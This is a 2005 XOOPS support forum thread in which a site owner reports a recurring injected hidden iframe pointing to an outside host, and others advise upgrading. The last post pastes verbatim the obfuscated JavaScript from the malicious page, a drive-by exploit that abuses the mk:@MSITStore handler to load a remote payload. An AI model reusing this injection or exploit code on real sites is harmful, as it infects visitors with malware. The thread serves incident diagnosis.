XOOPS 
Forum
Forum Index General Forums Community Support Modules Support Themes Support Development International Support Module Hack Reviews Theme Designer Talk
  1. Board index / 
  2. XOOPS Community Support forums / 
  3. Q and A 
  4.  / security problem: strange iframe link in my xoops code
Register
1
ucs484128
security problem: strange iframe link in my xoops code

  • 2005/7/11 8:15

  • ucs484128

  • Just popping in

  • Posts: 1

  • Since: 2005/6/15


In the bottom of my "index.php" page code,

There is a strange iframe link in my "index.php" page.

strange code is

"iFRAmE SRc = " hXXp://gamania.go.zccn.net/x/hinet. htm"

when i had removed those code yestoday,but it appears today.

I think i have injured SQL injection.

My XOOPS version is 2.0.7.

How can i do to solve this problem.

Thanks.
2
sikey
Re: security problem: strange iframe link in my xoops code

  • 2005/7/11 8:57

  • sikey

  • Not too shy to talk

  • Posts: 151

  • Since: 2003/4/29


Somehwat the same thing happend to my site... you can read about it here ->https://xoops.org/modules/newbb/viewtopic.php?topic_id=38361&forum=2&post_id=168219#forumpost168219
3
JMorris
Re: security problem: strange iframe link in my xoops code

  • 2005/7/11 11:01

  • JMorris

  • XOOPS is my life!

  • Posts: 2722

  • Since: 2004/4/11


Quote:
How can i do to solve this problem.


Upgrade to the latest stable version of XOOPS and install the Protector module.
Insanity can be defined as "doing the same thing over and over and expecting different results."

Stupidity is not a crime. Therefore, you are free to go.
4
bb2120
Re: security problem: strange iframe link in my xoops code

  • 2005/7/22 15:31

  • bb2120

  • Not too shy to talk

  • Posts: 179

  • Since: 2005/7/6 1


Have you seen the wierd javascript on the page the iframe pointed to?? It's very strange
5
bb2120
Re: security problem: strange iframe link in my xoops code

  • 2005/7/22 15:32

  • bb2120

  • Not too shy to talk

  • Posts: 179

  • Since: 2005/7/6 1


Here it is

<SCRIPT language=JavaScript>
var KASPERSKY_URL=document.location.href;
KASPERSKY_URL=KASPERSKY_URL.substring(0,KASPERSKY_URL.lastIndexOf('/'));
KASPERSKY_OOO='<oBJeCT';
KASPERSKY_AAA='@MS';
KASPERSKY_BBB='ITSt';
KASPERSKY_CCC='ore';
KASPERSKY_DDD=':mh';
KASPERSKY_EEE='tml';
KASPERSKY_FFF=':c:\\';
KASPERSKY_GGG='.mht!';
document.write(KASPERSKY_OOO+' style="display:none;" WiDth=0 HeiGht=0 tYpE="text/x-scriptlet" dAtA="mk:'+KASPERSKY_AAA+KASPERSKY_BBB+KASPERSKY_CCC+KASPERSKY_DDD+KASPERSKY_EEE+KASPERSKY_FFF+KASPERSKY_GGG+KASPERSKY_URL+'/hinet.css::/sh%2E%68%74m"></OBJECT>');
</SCRIPT>

Login

Register now!  |  Lost Password?

Search

Advanced Search

Recent Posts

Who's Online

157 user(s) are online (108 user(s) are browsing Support Forums)

Members: 0

Guests: 157

more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: Apr 30
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits